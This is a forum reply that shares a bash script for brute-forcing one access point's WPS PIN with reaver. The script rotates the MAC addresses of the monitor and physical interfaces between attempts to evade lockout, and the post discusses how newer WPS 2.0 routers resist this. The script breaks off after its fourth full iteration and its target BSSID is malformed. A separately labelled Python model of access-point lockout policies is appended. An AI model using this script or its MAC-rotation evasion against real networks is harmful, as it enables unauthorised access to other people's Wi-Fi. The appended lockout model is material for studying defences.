Quote: Originally Posted by mmusket33
To Repzeroworld

When mac spoofing sites like hotspots etc. you are correct. We use the exact same commands you are using. However, with reaver you need to use the series of commands and additions to the reaver command line or reaver will not function correctly. For second, third and fourth opinions on this we suggest you go to the WPS-Reaver site in Google and work thru the help files. This problem is explored in depth there. This is a common error with reaver users. We made the same mistake a few years ago.


TO: MMUSKET 33


Thank you for bringing this to my attention!
I made my script without focusing on this small piece of information in the mac spoofing area of the reaver help section. The reaver program behaves somewhat differently, I suppose.

A BETTER UNDERSTANDING OF WHY REAVER BEHAVES DIFFERENTLY WHEN ONLY THE VIRTUAL INTERFACE MAC ADDRESS IS CHANGED

I observed that my script ran the reaver program "ok", meaning that it "SOMETIMES" successfully attempted pins. However, frequently the reaver program gets stuck at "Sending identity response". I believe that changing the virtual interface of mon0 SOMETIMES affects the "Diffie-Hellman" secret numbers process which takes place at message 1 and 2 to agree on a common opened shared key before requesting the first pin. A couple of access points refused to send message 1 because of this. Nevertheless, instead of using the ifconfig utility to change my physical mac, I have used the macchanger utility to change my physical interface and my virtual interface which reaver uses. I ran reaver without using the -m flag (since I have already used macchanger to change my mac instead of giving reaver this option) and it successfully completed that Diffie-Hellman stage (message 1 and 2)!


REVISED SCRIPT
I have modified my script to change my physical and virtual interface to a specific defined mac address.

My script is now a little lengthy. It changes my mac address once after a pin is tried, for 11 times, and after that the script restarts itself. (I am still reading a book on bash scripting, so I suppose once I finish this book I will find a way to reduce this script's length.)


YOUR OPINION

What is your opinion on the new measures enacted for wps security? I have tried my revised script and it seems that changing my mac address at every pin attempt has no effect on the new cisco routers! These routers exponentially relate pin attempts with their wps locking feature. I observed that the more bad pin attempts tried, the router locks up for a longer period of time! Also, I am assessing another router that requests both halves of the pin at once, which makes reaver believe that message 5 received means that the first half of the pin is correct!
I did some searching on the web and found that this is a new measure for wps 2.0 version. Seems like this sweet little program, reaver, was taken seriously..haha..


However, my revised script is below:
#!/bin/bash
#Changing Mac Address to random Mac Address
while :; do echo
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m 88:51:e4:b8:d6:51 mon0;
printf "changing mac address of wlan1 interface\n";
sleep 3;
macchanger -m 88:51:e4:b8:d6:51 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4\n";
echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
sleep 2;
#SECOND TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m 3a:d8:5a:9e:d2:f7 mon0;
printf "changing mac address of wlan1 interface\n";
macchanger -m 3a:d8:5a:9e:d2:f7 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4\n";
echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
sleep 2;
#THIRD TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m aa:6d:9b:58:f0:83 mon0;
printf "changing mac address of wlan1 interface\n";
macchanger -m aa:6d:9b:58:f0:83 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4\n";
echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
sleep 2;
#FOURTH TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m 9a:92:2f:79:69:f1 mon0;
printf "changing mac address of wlan1 interface\n";
macchanger -m 9a:92:2f:79:69:f1 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4\n";
echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
sleep 2;
#FIFTH TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
printf "changing mac address of wlan1 interface\n";
sleep 3;
### THIS PROCESS GOES UNTIL 11 ATTEMPTS AND RESTARTS
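
Added example, not part of the original post and not any vendor's firmware: a small model of the lockout behaviour described above, seen from the access point's side, comparing failure counters keyed per client MAC with a single global counter whose lock time doubles on each trigger. The threshold, lock durations, attempt interval and MAC values are assumptions chosen for illustration.

```python
# AP-side WPS lockout model (constructed for illustration, not real firmware).
from collections import defaultdict


class WpsLockout:
    """Counts failed PIN attempts and locks WPS for an exponentially growing time."""

    def __init__(self, per_mac, threshold=3, base_lock=60, cap=86400):
        self.per_mac = per_mac        # True: one counter per client MAC; False: one global counter
        self.threshold = threshold    # failures allowed before each lock (assumed value)
        self.base_lock = base_lock    # first lock duration in seconds (assumed value)
        self.cap = cap                # upper bound on a single lock, in seconds
        self.fails = defaultdict(int)
        self.locks = defaultdict(int)            # locks triggered so far, per key
        self.locked_until = defaultdict(float)   # time at which the lock expires

    def _key(self, mac):
        return mac if self.per_mac else "*"

    def attempt(self, mac, now, pin_ok=False):
        """Return 'locked', 'ok' or 'fail' for a PIN attempt at time `now` (seconds)."""
        k = self._key(mac)
        if now < self.locked_until[k]:
            return "locked"
        if pin_ok:
            self.fails[k] = 0
            return "ok"
        self.fails[k] += 1
        if self.fails[k] >= self.threshold:
            self.fails[k] = 0
            lock = min(self.base_lock * 2 ** self.locks[k], self.cap)
            self.locks[k] += 1
            self.locked_until[k] = now + lock
        return "fail"


def failures_processed(policy, attempts, rotate_every, interval=5):
    """Count wrong PINs the AP actually evaluated when the client MAC
    changes every `rotate_every` attempts, one attempt per `interval` seconds."""
    processed = 0
    for i in range(attempts):
        # Constructed, locally administered MAC addresses.
        mac = "02:00:00:00:00:%02x" % ((i // rotate_every) % 256)
        if policy.attempt(mac, now=i * interval) == "fail":
            processed += 1
    return processed
```

With a new MAC on every attempt the per-MAC policy never locks, while the global policy evaluates only 12 of 110 wrong PINs in the same window; that is consistent with the observation in the post that changing the MAC had no effect on routers that lock this way.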